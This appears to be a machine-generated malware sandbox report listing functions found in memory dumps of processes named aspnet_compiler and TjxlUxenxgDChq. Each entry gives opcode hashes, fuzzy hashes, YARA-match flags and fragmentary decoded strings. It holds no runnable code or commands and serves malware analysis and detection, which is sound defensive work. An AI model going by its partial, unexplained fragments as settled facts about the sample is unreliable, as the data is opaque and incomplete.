                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallFilterFunc@8
                                                                                                        • String ID: @$@4_w@4_w
                                                                                                        • API String ID: 4062629308-713214301
                                                                                                        • Opcode ID: 3621afe2083098292d7458188854902059026c368f27a28a60bd6ca9987e74b5
                                                                                                        • Instruction ID: f7f09a36b346ced8f3abcfb2d7e7a72553196d63191fa89ab8b49da27ff70cc4
                                                                                                        • Opcode Fuzzy Hash: 3621afe2083098292d7458188854902059026c368f27a28a60bd6ca9987e74b5
                                                                                                        • Instruction Fuzzy Hash: 6841B275900225DFCF2ADFEAD840AADBBB8FF54B14F04412AEA25DB255D734D801CB61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$%$0$8T$9#$?$?g$F$K$L4$Qk$RH$S|$U$U$$a$g~$o$sw$t$w8$x$yt$yx$z2$z2$z6$`
                                                                                                        • API String ID: 0-1524650349
                                                                                                        • Opcode ID: bd8e543c6c00de6047ffffee068f2d39b5f3bbb96730d4ee21d89dd2b12d5ede
                                                                                                        • Instruction ID: 095ab4d13935b2d99cae99d846c1fd11df7c7ab9dddc8d22fc6566df58f0f1ce
                                                                                                        • Opcode Fuzzy Hash: bd8e543c6c00de6047ffffee068f2d39b5f3bbb96730d4ee21d89dd2b12d5ede
                                                                                                        • Instruction Fuzzy Hash: 2732FFB0D4526DCFEB24CF45C994BEDBBB2BB44308F5491DAD20A6B280C7B55A89CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$O$S$\$s
                                                                                                        • API String ID: 0-3854637164
                                                                                                        • Opcode ID: fc0cda636c61586208aff42ad2980f9d26ff70414eaa100de827a9edc96bbd9d
                                                                                                        • Instruction ID: 20c2f2a5ed471f819aba5fd357228ce9b7583e7caca3b72597fdc2ffe5de09ae
                                                                                                        • Opcode Fuzzy Hash: fc0cda636c61586208aff42ad2980f9d26ff70414eaa100de827a9edc96bbd9d
                                                                                                        • Instruction Fuzzy Hash: F25190B6D04318AADB10EB95DD88EFBB378EF44310F0481AAE9085E251E7725A54CBE5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: prOvM$prOvM
                                                                                                        • API String ID: 0-2482195191
                                                                                                        • Opcode ID: 456f1717278d9a58141ef32825ee24e54a548e2b719a936c32e7becc3610bb78
                                                                                                        • Instruction ID: 1356c2ef274fd64319018b92856b09beff5622d612f3a24d4a00410606a6308e
                                                                                                        • Opcode Fuzzy Hash: 456f1717278d9a58141ef32825ee24e54a548e2b719a936c32e7becc3610bb78
                                                                                                        • Instruction Fuzzy Hash: 27111CF6D0121CAF8B00DFA9D9409EFBBF9FF88210F14456EE919E7240E7715A148BA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 842332ac846885f927d84c61d485bbd97d81f7a11b96a0cc35fde0d29dbec690
                                                                                                        • Instruction ID: 98542e2879662582779c93724b95a3ceee85dd87451a8add08076e568c0371be
                                                                                                        • Opcode Fuzzy Hash: 842332ac846885f927d84c61d485bbd97d81f7a11b96a0cc35fde0d29dbec690
                                                                                                        • Instruction Fuzzy Hash: 8A411DB1D11218AFDB04CF9AC881EEEBBBCEF49710F50415EFA14E6240E7B19645CBA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f1f3af822c4388c8366b1c463916550fa2e66582e162e97c1fdef09d6d7415f9
                                                                                                        • Instruction ID: 0677b5e81c69f76472a1b2879b57d05526478915d090f7119014395802404f8e
                                                                                                        • Opcode Fuzzy Hash: f1f3af822c4388c8366b1c463916550fa2e66582e162e97c1fdef09d6d7415f9
                                                                                                        • Instruction Fuzzy Hash: 5831FEB5A00648AFDB14DF99CC41EEFB7B8EF89700F14810AF949AB240D774A915CBA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 68428d3c81624c5aa21f254920d9b33581bb1d17c9d7f85d6c47b53d9355c6eb
                                                                                                        • Instruction ID: 2aa4c6dde190ada7765944d1f4883b34701bee6bce5567bec0581b76999fbac5
                                                                                                        • Opcode Fuzzy Hash: 68428d3c81624c5aa21f254920d9b33581bb1d17c9d7f85d6c47b53d9355c6eb
                                                                                                        • Instruction Fuzzy Hash: 41213DB5A00708AFDB14DF98DC41EAFB7B8EF89710F04410AF9559B280D770A911CBA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5a6eacf075588b8350bfa136973dc7bf832b3614202c4ea64bed7376efe13179
                                                                                                        • Instruction ID: 1c06ec3a76feda3841b2ec2aa9a5f1ce9055b9b8540be97af4722056f0379a6b
                                                                                                        • Opcode Fuzzy Hash: 5a6eacf075588b8350bfa136973dc7bf832b3614202c4ea64bed7376efe13179
                                                                                                        • Instruction Fuzzy Hash: AF1186B67807057BF720EA568C42FAB776CDF85B14F24401AFB04AE2C1D6B5B81186B9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e92ec7abbfb3a368f9a5dae6685b281ec5ebe1a2506585e7df2b6a963a43c105
                                                                                                        • Instruction ID: 89135ae70425caf5e3cc2970b45e30bfa8496e840f84c1ea56b3c85dc4dbdc57
                                                                                                        • Opcode Fuzzy Hash: e92ec7abbfb3a368f9a5dae6685b281ec5ebe1a2506585e7df2b6a963a43c105
                                                                                                        • Instruction Fuzzy Hash: F22121B6D01219AF8B00DFD9D9409EFBBF9EF88210F04416EE919E7200E7715A14CBE0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 58941e722507f1b726063fa8304dcdfe08f302c1cf5735b7694975b77b0859cb
                                                                                                        • Instruction ID: 9b7ea1d857183a0e919b63346faab3564e351b28afc510a96528709c774943c3
                                                                                                        • Opcode Fuzzy Hash: 58941e722507f1b726063fa8304dcdfe08f302c1cf5735b7694975b77b0859cb
                                                                                                        • Instruction Fuzzy Hash: 71118E75A01744AFD710DBA4CC41FEFB7ACEB86700F44444EFA495B280DB746915C7A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 559d78c6c01c5705f61cbc9d6634edd8e91f37410e80098cfb6fee9560ad72da
                                                                                                        • Instruction ID: 31436621b2a18c996fe5066a9de38eafe604005e0af142ca46394d7d8c002cb7
                                                                                                        • Opcode Fuzzy Hash: 559d78c6c01c5705f61cbc9d6634edd8e91f37410e80098cfb6fee9560ad72da
                                                                                                        • Instruction Fuzzy Hash: 6F115E75A00744AFD710DB94CC41FEFB3ACEB86710F44450EF9499B681DB706915C7A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9136f0b4e6f82bae56836d4acb0b58e3eba22f86ad65b3f033c4412c498a3f77
                                                                                                        • Instruction ID: d7d7decb148e280438ff985afe20a09461c1d6fd95782a191be0d57ae958c574
                                                                                                        • Opcode Fuzzy Hash: 9136f0b4e6f82bae56836d4acb0b58e3eba22f86ad65b3f033c4412c498a3f77
                                                                                                        • Instruction Fuzzy Hash: 1E01A2B6204548BBCB44DE89DC80EDB77ADAB8C654F504109BA0997240D630E8518BA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 267809e32fe2cca1da05e060e3bafaf7357977837e45c4712960c19d7433c403
                                                                                                        • Instruction ID: 1b6dfd9f4a579719efd1d3fb083556231239d4d73e0a119152aae67c31b1a22e
                                                                                                        • Opcode Fuzzy Hash: 267809e32fe2cca1da05e060e3bafaf7357977837e45c4712960c19d7433c403
                                                                                                        • Instruction Fuzzy Hash: 2C01D7B6C11219AFDB40DFE8D941AEEBBF8AB08200F54456EE919F7200F7715A048BA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8bd2ddac07729ed2154198907967d7c3ebb5e703420a53d12d3232238dded502
                                                                                                        • Instruction ID: 0db3dd3d734315c7ddc17cb9e1ade43ac0f27fd8d81ecc53a54b8090c7c32629
                                                                                                        • Opcode Fuzzy Hash: 8bd2ddac07729ed2154198907967d7c3ebb5e703420a53d12d3232238dded502
                                                                                                        • Instruction Fuzzy Hash: 8BF02B776052062FE7109E7DAC84F96FB9CEF85234F540226F9188B252E232942587A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f4f987a3898adfda513e7102cbd3e2612d5f3e87d07c3329fb746be6a971821
                                                                                                        • Instruction ID: b003980c3d2cb53416885a7d0b58cc4c7d02d8a4b354f94778eaeff08a39c8b2
                                                                                                        • Opcode Fuzzy Hash: 6f4f987a3898adfda513e7102cbd3e2612d5f3e87d07c3329fb746be6a971821
                                                                                                        • Instruction Fuzzy Hash: 02F0BBB5D18319AEDB10FBA5CC44EBB7378DF44710F00419AE948AE290F6718956CFA9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c0e6fd706af8e76db2c39e1c5c7af8f7d4d5ce7585e7c4315588db62aaaaaad6
                                                                                                        • Instruction ID: 01e458d9d3701c470d92a5bf336fa342b16c70383a9583de2dc881616ed30fbf
                                                                                                        • Opcode Fuzzy Hash: c0e6fd706af8e76db2c39e1c5c7af8f7d4d5ce7585e7c4315588db62aaaaaad6
                                                                                                        • Instruction Fuzzy Hash: DBF01CB5200608BFD714EF99DC81EAB7BADEF89610F048009BA18DB241D670B921CBB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                                                                        • Instruction ID: 5bf31959ff80a1d9693bffcc01047d42bac1eb09b919677573fd7ced95d2f86a
                                                                                                        • Opcode Fuzzy Hash: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                                                                        • Instruction Fuzzy Hash: 35E09275244308BFD614EE99DC81FAB77ACEFC9710F04001AF908AB241DA30BC1087B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                                                                        • Instruction ID: b933966d0f010e7c4225869b59ad795281259cac8498b3014213698bd8fbb48e
                                                                                                        • Opcode Fuzzy Hash: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                                                                        • Instruction Fuzzy Hash: A0E06D752043487FD614EE99DC81FAB73ACEF89710F444409F908AB241C670B81186B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                                                        • Instruction ID: 0f3e67b76a8cea649a1af76b65657a99ea20751633d6951bdab70bf909ef40e9
                                                                                                        • Opcode Fuzzy Hash: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                                                        • Instruction Fuzzy Hash: E9F08271D15208EBDB14DF64D841BDEBBB8EF44320F1047AEE8249B2C0E63597608785
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a4bbfbf7fc2d41ab0dbdc3e2022a5072b4fa24efcc5efe0c9a7ba8c8b62e1444
                                                                                                        • Instruction ID: a64117b3a0aabd3dd4aa76f0dc09097a15b0e5a97cd07e5e291cbb5d0195a001
                                                                                                        • Opcode Fuzzy Hash: a4bbfbf7fc2d41ab0dbdc3e2022a5072b4fa24efcc5efe0c9a7ba8c8b62e1444
                                                                                                        • Instruction Fuzzy Hash: 98E04F76A016146BD621958A9C05FEBF76CCFC6A60F19006AFE189F340E561E92182E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                                                                        • Instruction ID: 20878b6498811fd407546060a7bc72967b6868a73e7d52385ca14140a5163b65
                                                                                                        • Opcode Fuzzy Hash: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                                                                        • Instruction Fuzzy Hash: 3FE086352007487BD220EA59DC40FDB775CDFC5720F44441AFA08AB241CA70B91187F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 18aae9edb5de9a32fcc337ac4d6acfd33dafae59829a63909a52df1ec6eedcd5
                                                                                                        • Instruction ID: 4315e9bd94d997b73f0b533a678310d10c93d08f12588b25c90233db4600fbc3
                                                                                                        • Opcode Fuzzy Hash: 18aae9edb5de9a32fcc337ac4d6acfd33dafae59829a63909a52df1ec6eedcd5
                                                                                                        • Instruction Fuzzy Hash: C8C012755003086FD600DA88CC45FA5339C9B08610F004055B90C8F241D571F9704654
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9312a351402ee596c66a7fecee2d149e52834a03b74e6056d8e5f66f176a4e3e
                                                                                                        • Instruction ID: 3aaf246230433d7bf6c3de9d7c8a449323a2adcb9cbb3946887bbda846b3fa2f
                                                                                                        • Opcode Fuzzy Hash: 9312a351402ee596c66a7fecee2d149e52834a03b74e6056d8e5f66f176a4e3e
                                                                                                        • Instruction Fuzzy Hash: DEA0228E00028228B80232B0CF83C020C020C220203C228A022C3AC302B3C08032208B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                        • API String ID: 0-3248090998
                                                                                                        • Opcode ID: 0620466a3845bbc062931b974bc1427a4194e66a9aec07365f9095910b7e5ed7
                                                                                                        • Instruction ID: 9a9f7dd105d8d5e458671cbd6cf782768c1bbeddb354b137560628d00f5302b6
                                                                                                        • Opcode Fuzzy Hash: 0620466a3845bbc062931b974bc1427a4194e66a9aec07365f9095910b7e5ed7
                                                                                                        • Instruction Fuzzy Hash: A691FFF09052A98ACB118F55A4603DFBF71BB95204F1581E9C6AA7B243C3BE4E85DF90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #3Q$ $= $ $= %$!'&'$!(3@$%$&=#3$&=#=$'*[:$'='=$3Rcc$3Tvp$;X[G$;_z}$<& $$<X\G$= %3$=+'3$@rur$P{a|$R}wa$^>G&$^_?3$^|iz$az<&$fk(3$qXzg$x|:3$|zw3$~v<'
                                                                                                        • API String ID: 0-880084792
                                                                                                        • Opcode ID: 280d311d0dd18883a77ab50e7889fa37f008022c2e596b684e8eba1d4c517e16
                                                                                                        • Instruction ID: 080eb177cd162d29c4980be971f5506b4df4c456558d1f7b697e5afd52597d6d
                                                                                                        • Opcode Fuzzy Hash: 280d311d0dd18883a77ab50e7889fa37f008022c2e596b684e8eba1d4c517e16
                                                                                                        • Instruction Fuzzy Hash: 6D31BBB4C153499EDB21CFDADA806DDBF70BF01340F60A648E9146F255D7714A82CF89
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$%$8T$9#$?$?g$F$K$L$L4$Qk$RH$S|$U$U$$a$g~$o$pV$sw$t$w8$x$yt$yx$z2$z6$`
                                                                                                        • API String ID: 0-3091264016
                                                                                                        • Opcode ID: 15397a4db251b39f734a807aadbf5c1dbb3088f89c1376836043bc8cf80ff60b
                                                                                                        • Instruction ID: ad1b7d57316d027c9760924743213a979b03bc15accccfb8642ea6dddb6548d0
                                                                                                        • Opcode Fuzzy Hash: 15397a4db251b39f734a807aadbf5c1dbb3088f89c1376836043bc8cf80ff60b
                                                                                                        • Instruction Fuzzy Hash: A88125B0C05769CAEB20CF91C9587DEBAB1BB05308F5081D8C15D3B291C7FA1A89CF95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                        • API String ID: 0-392141074
                                                                                                        • Opcode ID: b2b21c2cda09f390fb1c3d572e926b7fd9a366d1141940bd88779b20454a9c15
                                                                                                        • Instruction ID: bbc0581c6b5a50443377ee8825bbcd4c2732b34172909eb315952d057af57156
                                                                                                        • Opcode Fuzzy Hash: b2b21c2cda09f390fb1c3d572e926b7fd9a366d1141940bd88779b20454a9c15
                                                                                                        • Instruction Fuzzy Hash: F8714CF5D00718AEDB25DBA4CC80FEEB778BF08700F04419EE508AA140EB756B598FA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                        • API String ID: 0-392141074
                                                                                                        • Opcode ID: b20e850e862e75e3265be240c4e8fec7faa1e4e34796897b2e013ac060238a45
                                                                                                        • Instruction ID: c0d7213ee4d402174eee0269a10be35f5774df9b93b2b738a6dcc3bfa1d2abb8
                                                                                                        • Opcode Fuzzy Hash: b20e850e862e75e3265be240c4e8fec7faa1e4e34796897b2e013ac060238a45
                                                                                                        • Instruction Fuzzy Hash: 84613CF5D10718AEDB25DBA4CC80FEEB779BF08300F04419EE509AA140EB756B488F65
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                        • API String ID: 0-685823316
                                                                                                        • Opcode ID: 6ff364ae48a99562bcd481936431b1f9aac601dc56cbec4dd2f28dbc4b3a6a79
                                                                                                        • Instruction ID: 1b93ef097ce736bfdfc94df60d63826a091fca6634a15358f72f2c1d4c0b6e4b
                                                                                                        • Opcode Fuzzy Hash: 6ff364ae48a99562bcd481936431b1f9aac601dc56cbec4dd2f28dbc4b3a6a79
                                                                                                        • Instruction Fuzzy Hash: 2B3180B5D41318AEEF40DFD4CC85BEEBBB9AF08704F10815DE608BA180DBB51608CBA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_3190000_TjxlUxenxgDChq.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                                                        • API String ID: 0-620024284
                                                                                                        • Opcode ID: ed91b1cb8b3c9b7552cfaf94364469c17089b04059ae31e681c9ed457abfdd17
                                                                                                        • Instruction ID: 1ea65672a54e3e22a7d131b041f3d2122b0a08a446b445ba8eddcfffc8ce5e50
                                                                                                        • Opcode Fuzzy Hash: ed91b1cb8b3c9b7552cfaf94364469c17089b04059ae31e681c9ed457abfdd17
